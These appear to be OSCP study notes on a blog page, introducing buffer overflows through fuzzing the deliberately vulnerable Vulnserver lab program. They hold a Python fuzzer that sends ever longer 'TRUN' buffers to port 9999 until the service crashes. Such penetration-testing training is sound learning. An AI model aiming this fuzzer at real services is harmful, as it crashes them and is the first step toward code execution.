Introduction to Buffer Overflows

Anatomy of Memory

Anatomy of the Stack

Fuzzing

Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver

Immunity Debuger - https://www.immunityinc.com/products/debugger/

Vulnserver Test

1. Open the vulnserver program on windows os.

2. Connect to the vulnserver from Kali Linux.

nc -nv 10.0..XX

3.Write the Python fuzzer test script on Kali Linux

 #!/usr/bin/python

 import socket

 import sys

 buffer=["A"]

 counter=100

 while len(buffer) <= 30:

     buffer.append("A"*counter)

     counter=counter+200

 for string in buffer:

     print "Fuzzing vulnserver with %s bytes" % len(string)

     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     connect=s.connect(('10.0.0.XX',9999))

     s.send('TRUN /.:/' + string)

     s.close()

Grant the rights to the script file and execute the fuzzer.py.

chmod  fuzzer.py
./fuzzer.py

The vulnserver crashed with 5900 bytes.

Immunity Debuger

GUI Screenshoot

Open or attach the vulnserver program.

Perform the fuzzer.py on Kali Linux.

./fuzzer.py

The vulnserver crashed finally.

OSCP Learning Notes - Buffer Overflows(1)的更多相关文章

  1. OSCP Learning Notes - Buffer Overflows(3)

    Finding Bad Characters 1. Find the bad charaters in the following website: https://bulbsecurity.com/ ...

  2. OSCP Learning Notes - Buffer Overflows(2)

    Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/sha ...

  3. OSCP Learning Notes - Buffer Overflows(5)

    Generating Shellcode & Gaining Root 1.Generate the shellcode on Kali Linux. LHOST is the IP of K ...

  4. OSCP Learning Notes - Buffer Overflows(4)

    Finding the Right Module(mona) Mona Module Project website: https://github.com/corelan/mona 1. Downl ...

  5. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

  6. OSCP Learning Notes - Exploit(3)

     Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website ...

  7. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  8. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  9. OSCP Learning Notes - Netcat

    Introduction to Netcat Connecting va Listening Bind Shells Attacker connects to victim on listening ...

随机推荐

  1. APP自动化1——Appium+pycharm自动化环境搭建全流程

    1. 安装python3,pycharm,可参考之前写的文档:https://www.cnblogs.com/chenweitoag/p/13154815.html 2. 准备以下必要工具: 基于wi ...

  2. Java对MongoDB的CRUD

    https://blog.51cto.com/aiilive/1339058 MongoDB提供的Java操作API可以说是对Mongo数据库命令的Java翻译,熟悉Mongo命令,熟悉Java操作数 ...

  3. SpringMVC 学习笔记(四)

    41. 尚硅谷_佟刚_SpringMVC_返回JSON.avi SpringMVC中使用@ResponseBody注解标注业务方法,将业务方法的返回值做成json输出给页面 导包: 除了一些sprin ...

  4. Python 简明教程 --- 9,Python 编码

    微信公众号:码农充电站pro 个人主页:https://codeshellme.github.io 当你选择了一种语言,意味着你还选择了一组技术.一个社区. -- Joshua Bloch 目录 1, ...

  5. ceph rbd块存储挂载及文件存储建立

    一.rbd块存储挂载 1 创建一个OSD pool # ceph osd pool create rbd1 128 查询存储空间使用 # ceph df GLOBAL: SIZE AVAIL RAW ...

  6. HDU3686 Traffic Real Time Query【缩点+lca】

    题目 City C is really a nightmare of all drivers for its traffic jams. To solve the traffic problem, t ...

  7. (win7) 在IIS6.0 中配置项目

    1.进入IIS管理器 右击“计算机”->管理->服务和应用程序->Internet信息服务(IIS)管理器 2.将项目加入IIS中 网站->右击“默认网站”->添加虚拟目 ...

  8. 不花钱搞定PDF编辑难题

    PDF格式是专为显示而设计的格式,并不容易被编辑,市面上并没有一款可以真正免费使用的PDF编辑器. 不花钱搞定PDF编辑难题的办法: 1.免费使用PDF编辑器+去水印:免费版的PDF编辑器不是会加水印 ...

  9. html5中contenteditable 光标_如何设置光标位置

    在js中,光标是一个对象,当你选中某个元素的时候才会出现光标对象.比如:我们点击一个输入框,实际会产生一个选中对象-selection,这个对象我们可以通过indow.getSelection()来获 ...

  10. 《 ZooKeeper : Wait-free coordination for Internet-scale systems 》论文研读

    Zookeeper 研读 说明:本文为论文 < ZooKeeper : Wait-free coordination for Internet-scale systems > 的个人理解, ...